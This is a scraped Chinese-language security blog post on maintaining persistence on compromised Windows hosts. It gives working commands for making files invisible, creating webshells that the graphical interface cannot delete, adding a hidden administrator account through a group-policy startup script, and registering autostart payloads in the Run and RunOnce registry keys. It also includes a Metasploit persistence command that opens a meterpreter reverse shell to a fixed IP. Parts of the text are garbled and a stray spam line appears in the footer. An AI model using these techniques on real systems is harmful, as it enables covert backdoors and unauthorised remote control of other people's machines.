<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Windows權限維持學習

    VSole2021-12-16 20:06:43

    0x01 隱藏技巧

    ”真正“隱藏文件 

    使用attrib +s +a +h +r命令就是把原本的文件夾增加了系統文件屬性、存檔文件屬性、只讀

    文件屬性和隱藏文件屬性。

    attrib +s +a +h +r c:\test
    

    這樣不管是否隱藏文件,此文件都不可見

    取消:

    attrib -s -a -h -r c:\test
    

    系統文件夾圖標

    1.將文件名重命名為 我的電腦.

    {20D04FE0-3AEA-1069-A2D8-08002B30309D}
    

    (這個是注冊表里

    面的clsid,打開過后也是我的電腦)

    2.其他clsid

    我的電腦 {20D04FE0-3AEA-1069-A2D8-08002B30309D}我的文檔 {450D8FBA-AD25-11D0-98A8-0800361B1103}撥號網絡 {992CFFA0-F557-101A-88EC-00DD010CCC48}控制面板 {21EC2020-3AEA-1069-A2DD-08002B30309D}計劃任務 {D6277990-4C6A-11CF-8D87-00AA0060F5BF}打印機 {2227A280-3AEA-1069-A2DE-08002B30309D}記事本 {1FBA04EE-3024-11D2-8F1F-0000F87ABD16}網絡鄰居 {208D2C60-3AEA-1069-A2D7-08002B30309D}回收站 {645FF040-5081-101B-9F08-00AA002F954E}公文包 {85BBD920-42A0-1069-A2E4-08002B30309D}字體 {BD84B380-8CA2-1069-AB1D-08000948F534}Web 文件夾 {BDEADF00-C265-11d0-BCED-00A0C90AB50F}
    

    畸形目錄 

    只需要在目錄名后面加兩個點(也可以是多個點),畸形目錄和windows版本有關聯。不是所有版本通用 

    創建目錄:

    md a...\ ,
    

    實際顯示為a.. 

    復制文件:

    copy file c:\dir\a...\file
    

    url訪問:

    /a.../file
    

    刪除目錄:

     rd /s /q a...\
    

    測試后發現好像在某些系統版本是可以訪問目錄的,但是圖形化界面還是無法刪除

    利用系統保留文件名創建圖形化界面無法刪除的webshell,只能用命令行刪除

    Windows下不能夠以下面這些字樣來命名文件/文件夾,包括:

    aux/com1/com2/prn/con/nul
    

    但是通過cmd下是可以創建、刪除此類文件夾的,使用copy命令:

    copy file \\.\c:\dir\aux.aspdel \\.\c:\dir\aux.asptype \\.\c:\dir\aux.asp
    

    \\.\是Windows下的特性,創建文件的時候加上了那訪問的時候也必須加上

    驅動級文件隱藏 

    驅動隱藏最典型的現象就是系統盤存在以下文件

    xlkfs.datxlkfs.dllxlkfs.ini...
    

    使用軟件

    Easy file locker
    

    0x02 組策略

    因為其極具隱蔽性,因此可以利用來做服務器后門。可以通過這個后門運行某些程序或者

    腳本,比如創建一個管理員用戶

    echo offnet user hack$ test168 /addnet localgroup administrator hack$ /addexit
    

    運行->gpedit.msc->計算機配置->Windows設置->腳本(啟動/關機),組策略中的這個后

    門可以利用來運行腳本或者程序,嗅探管理員密碼等

    0x03 注冊表-regedit

    metasploit和sharpersist都提供了這種能力,在Windows登陸期間創建將執行任意負載的注

    冊表的項。

    Run: 該項下的鍵值即為開機啟動項,每一次隨著開機而啟動,作為持久化后門

    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /vtest /t REG_SZ /d "C:\Program Files (x86)\test.exe"reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce"/v test /t REG_SZ /d "C:\Program Files (x86)\test.exe"reg add"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /vtest /t REG_SZ /d "C:\Program Files (x86)\test.exe"reg add"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"/v test /t REG_SZ /d "C:\Program Files (x86)\test.exe"
    說明:/v 是指所選項下要添加的值名;/ve 添加空白值名(無名稱);/t regkey數據類型,忽略則默認采用REG_SZ(S:字符串類型,Z:以零字節結尾)/d 要分配給添加的值名的數據,開機啟動C:\Program Files (x86)\1.py/f 強行修改現有注冊表項
    

    cmd把用戶從用戶組中刪除(即使是管理員用戶也需要單獨屬于Administrator組,不能同

    時屬于其他用戶組):

    net localgroup 用戶組 用戶名 /delete
    

    如果已經獲得提升的憑據(管理員和system權限),則最好使?本地計算機注冊表位置,

    ?不是當前?戶,因為有效負載將在每次 系統啟動時執?,?與使?系統身份驗證的?戶

    ?關。通常HKEY_LOCAL_MACHINE中的設置優先級要高于 HKEY_CURRENT_USER。此方法

    也需要用戶單獨屬于Administrator組。

    eg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /vtest /t REG_SZ /d "C:\Program Files (x86)\test.exe"reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce"/v test /t REG_SZ /d "C:\Program Files (x86)\test.exe"reg add"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /vtest /t REG_SZ /d "C:\Program Files (x86)\test.exe"reg add"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"/v test /t REG_SZ /d "C:\Program Files (x86)\test.exe"
    

    另外兩個注冊表位置 

    允許紅隊人員通過執行任意有效負載或DLL來實現持久性,這些將在登陸期間執行,并且

    需要管理員級別的特權(此方法也需要用戶單獨屬于Administrator組)。

    reg add"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001"/v Pentestlab /t REG_SZ /d "C:\Program Files (x86)\test.exe"reg add"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Dep end" /v Pentestlab /t REG_SZ /d "C:\Program Files (x86)\test.dll"
    

    msf 注冊表dll注入權限維持 

    msf中帶有腳本和后期利用模塊來通過注冊表達到持久性,msf腳本將以vbs腳本的形式創

    建一個有效負載,將負載拖放到磁盤上,并創建一個注冊表項,該注冊表項將在用戶登陸

    期間運行該負載。

    run persistence -U -P windows/meterpreter/reverse_tcp -i 5 -p 1234 -r 192.168.211.128
    說明:-U #用戶登陸時啟用-P #指定payload-i #連接間隔時間-p #連接端口-r #連接主機
    

    執行結果說明:

    C:\Usersatha\AppData\Local\Temp\buFUzcFJpNNFu.vbs #vbs負載所在路勁HKCU\Software\Microsoft\Windows\CurrentVersion\Run\uoHiFnBHv #注冊表項所在路徑
    
    注冊表
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    實際上,之所以很少有文章討論這種注冊表功能,并不是因為整個信息安全社區的技術差距。但是,注冊表的雜亂無章的特性,貌似對攻擊者特別有利,因為這便于藏匿其權限維護機制,并在網絡外潛伏,直到藍隊轉移視線。運行鍵存在于注冊表中。因此,攻擊者的one-liner命令的字符數不能超過這個限制。如果被寫入到\Run的話,它在執行后并不會被刪除。在進行安全審計時,有時需
    Windows 注冊表中包含有二進制塊,有些二進制塊用于存儲證書,如下所示:以下的注冊表位置都存儲證書:
    簡介實驗環境是Win7 X86系統。曾經在這篇文章中常見的幾種DLL注入技術說過,通過修改注冊表的內容可以實現AppInit_DLLs注入。那么本文的實驗是通過CmRegisterCallback來實現對注冊表修改的監控以此來阻止修改。并通過對CmRegisterCallback的逆向分析來實現對監控函數的刪除。
    在win2012以前的操作系統版本下,由于WDigest將明文儲存到lsass進程中,可以抓取明文密碼。
    mimikatz的這個功能從本質上是解析Windows的數據庫文件,從而獲取其中存儲的用戶哈希。
    2023年3月6日,基于星火·鏈網區塊鏈基礎設施構建的分布式標識BID解析服務全球專用端口號正式寫入IANA的服務端口注冊表,形成全球共識,標志著分布式標識BID向全球提供統一解析服務又邁出堅實的一步。IANA工作組的職責包括:為全球互聯網提供IP地址空間分配、維護根域名服務器和協議標識符等標準數字資源。
    系統安全第41篇是PowerShell系列的基礎知識和注冊表操作,希望您喜歡
    代碼框架 想法是盡量用一個通用的注入框架,有異常接收,令牌權限開啟,獲取進程PID的功能
    文件系統Process Monitor顯示所有的Windows文件系統活動,包括本地磁盤和遠程文件系統。它會自動探測到新的文件系統設備并監聽它們。所有的系統路徑都會被顯示為相對于在用戶會話中的一個文件系統操作的執行。最后5個并排的按鈕,是用來設置捕獲哪些類型的事件,分別表示注冊表的讀寫、文件的讀寫、網絡的連接、進程和線程的調用和配置事件。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类